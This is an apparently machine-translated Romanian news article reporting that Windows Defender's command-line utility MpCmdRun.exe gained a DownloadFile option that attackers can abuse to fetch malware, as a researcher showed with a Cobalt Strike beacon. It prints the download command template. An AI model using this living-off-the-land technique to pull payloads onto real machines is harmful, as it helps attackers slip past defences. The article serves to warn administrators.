Windows Defender se transformă într-o aplicație periculoasă pentru administratori

  • Windows Apărător în Windows 10 este un instrument excelent pentru apărarea sistemului dvs., dar o nouă actualizare l-a transformat într-o amenințare.
  • Un nou DownloadFile comanda poate fi utilizată pentru a descărca orice fișier extern, inclusiv malware pe computer.
  • Explorează-ne Secțiunea software pentru cele mai bune articole despre cele mai recente instrumente digitale.
  • Dacă sunteți interesat de cele mai recente articole Windows 10, vizitați cuprinzătorul nostru Windows 10 Hub.
Windows Defender se transformă într-un LOLBIN

Windows Defender în Windows 10 este prima linie de apărare în caz de atacuri malware și face o si o treaba destul de buna.

Cu toate acestea, într-una dintre noile sale actualizări, puternicul antivirus a primit o nouă comandă DownloadFile, care va permite oricui să descarce orice fișier dintr-un URL pe o anumită cale de pe computer.

Putem numi acest lucru un exploit, deoarece ar putea fi folosit și pentru a descărca chiar malware, lucru descoperit de cercetătorul în securitate Mohammad Askar care postat descoperirea sa pe Twitter.

Cum se poate utiliza Windows Defender pentru a descărca programe malware?

Este foarte simplu să folosiți Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) pentru a descărca orice fișier dintr-o sursă externă pe computer.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

În încercarea sa, Askar a reușit să descarce baliza Cobalt Strike, un cunoscut instrument de atacare care utilizează această linie de comandă.

Noua comandă este inclusă în versiune 4.18.2007.8-0 și în sus, ceea ce oferă un timp de început destul de bun pentru atacatori.

Practic, această caracteristică se transformă Windows Defender într-un LOLBIN (care trăiește din linii binare), un fișier de sistem inofensiv care poate fi utilizat în scopuri rău intenționate.

Din fericire, după ce descărcați fișierul dăunător, acesta va fi detectat de același Windows Defender sau de altul program antivirus daca prezentul.

Dintr-un software de protecție fiabil, Windows Defender s-a transformat într-o altă posibilă amenințare care va trebui monitorizată îndeaproape de administratori și experți în securitate.

Dacă aveți sugestii sau comentarii, vă rugăm să le lăsați mai jos în secțiunea Comentarii.

Insider build 22518 introduce accesul vocal în Windows 11

Insider build 22518 introduce accesul vocal în Windows 11Miscellanea

În caz că nu știai deja, Windows 11 Build 22518 este acum disponibil pentru toți cei din interiorul canalului Dev.Cu toate acestea, spre deosebire de actualizările anterioare, build 22518 vine cu n...

Citeste mai mult
Battlefield 2042 tocmai a coborât din topul celor mai jucate 50 de jocuri Xbox

Battlefield 2042 tocmai a coborât din topul celor mai jucate 50 de jocuri XboxMiscellanea

Dacă ești un jucător Battlefield, este posibil să fi observat că jocul 2042 nu se mai află în topul celor mai jucate 50 de jocuri pe Xbox.Primele 50 de jocuri sunt cele cu cel mai mare număr de juc...

Citeste mai mult
Atacatorii exploatează acreditările Office 365 pentru a accesa rețelele organizațiilor

Atacatorii exploatează acreditările Office 365 pentru a accesa rețelele organizațiilorMiscellanea

Atacatorii pot ocoli MFA pe Microsoft Office 365 furând coduri de autorizare sau jetoane de acces.Echipa Microsoft Threat Intelligence a urmărit o campanie de programe malware care afectează organi...

Citeste mai mult